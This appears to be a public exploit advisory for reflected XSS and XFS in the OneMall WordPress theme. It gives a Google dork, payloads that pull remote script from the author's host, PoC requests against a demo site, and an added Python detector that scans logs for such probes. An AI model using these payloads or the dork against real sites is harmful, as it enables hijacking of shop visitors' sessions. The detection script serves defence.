Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100178


OneMall WordPress theme v1.7.7 - Unauthenticated Reflected XSS & XFS
[+] :: Exploit Title: OneMall WordPress theme v1.7.7 - Unauthenticated Reflected XSS & XFS
[+] :: Google Dork: inurl:/wp-content/themes/onemall/
[+] :: Date: 2020-10-20
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: MAGENTECH [ https://www.magentech.com ]
[+] :: Software Version: 1.7.7
[+] :: Software Link: https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400
[+] :: Tested on: Kali Linux
[+] :: CVE: 
[+] :: CWE: CWE-79, CWE-1021


[i] :: Info:

Unauthenticated reflected XSS and XFS vulnerabilities were discovered in the OneMall theme v1.7.7 for WordPress.


[$] :: Payloads:

"><script src=https://ex-mi.ru/payload/a2r.js></script>

"><embed src=https://ex-mi.ru/payload/xfsii.html>


[!] :: PoC Unauthenticated Reflected XSS:

https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product


[!] :: PoC Unauthenticated Reflected XSS (Burp Suite):

GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1
Host: demo.wpthemego.com


[!] :: PoC Unauthenticated XFS:

https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product


[!] :: PoC Unauthenticated XFS (Burp Suite):

GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1
Host: demo.wpthemego.com
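The two request shapes above (the theme search page reflecting `s`, and the `sw_search_products_callback` AJAX action reflecting `query`) are easy to hunt for in web-server access logs. The script below is an added example, not code from the advisory or the theme: it parses Combined Log Format lines, URL-decodes the parameters the advisory shows being reflected, and flags values that break out of an attribute and inject an element (`"><script`, `"><embed`, and similar), including double-encoded variants. The log lines, IP addresses and the `attacker.invalid` host are constructed placeholders; the parameter names and the AJAX action name come from the PoC requests on this page.

```python
"""Flag reflected-XSS probes of the OneMall kind in access logs.

Added example (not the theme's or the advisory author's code). Sample log
lines, client IPs and the attacker.invalid host are constructed placeholders.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Parameters the advisory shows being reflected into the page without encoding:
# `s` on the theme search page, `query` on the sw_search_products_callback action.
REFLECTED_PARAMS = {"s", "query"}

# A decoded value is suspicious when it closes the surrounding attribute/tag and
# opens a new element, e.g.  "><script ...>  or  "><embed ...>
TAG_BREAKOUT = re.compile(r'["\']?\s*>\s*<\s*([a-z][a-z0-9]*)', re.IGNORECASE)

# Minimal Combined Log Format parser: only the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def find_injected_tags(target: str) -> list[tuple[str, str]]:
    """Return (parameter, tag_name) pairs for every reflected parameter in the
    request target whose decoded value injects an HTML element."""
    hits = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if name not in REFLECTED_PARAMS:
            continue
        for value in values:
            # parse_qs already decoded once; a second pass catches double encoding.
            for candidate in (value, unquote_plus(value)):
                m = TAG_BREAKOUT.search(candidate)
                if m:
                    hits.append((name, m.group(1).lower()))
                    break
    return hits


def scan_log(lines) -> list[dict]:
    """Return one finding per log line whose reflected parameters inject markup."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        tags = find_injected_tags(m["target"])
        if tags:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]),
                "injected": tags,
            })
    return findings


# Constructed sample log: a benign search, the two request shapes from the
# advisory (script via `s`, embed via `query`), and a double-encoded variant.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Oct/2020:10:00:01 +0000] "GET /layout2/?category=&s=red+shoes&search_posttype=product HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Oct/2020:10:00:02 +0000] "GET /layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fattacker.invalid%2Fa.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1" 200 5301 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Oct/2020:10:00:03 +0000] "GET /layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fattacker.invalid%2Fx.html%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Oct/2020:10:00:04 +0000] "GET /layout2/?s=%2522%253E%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 on an unpatched theme means the payload was served back; after the theme is updated (or the output wrapped in WordPress's `esc_attr()`), the same requests still appear in the log, so the rule is for spotting probing rather than confirming exploitation.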


[@] :: Contacts:

Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi
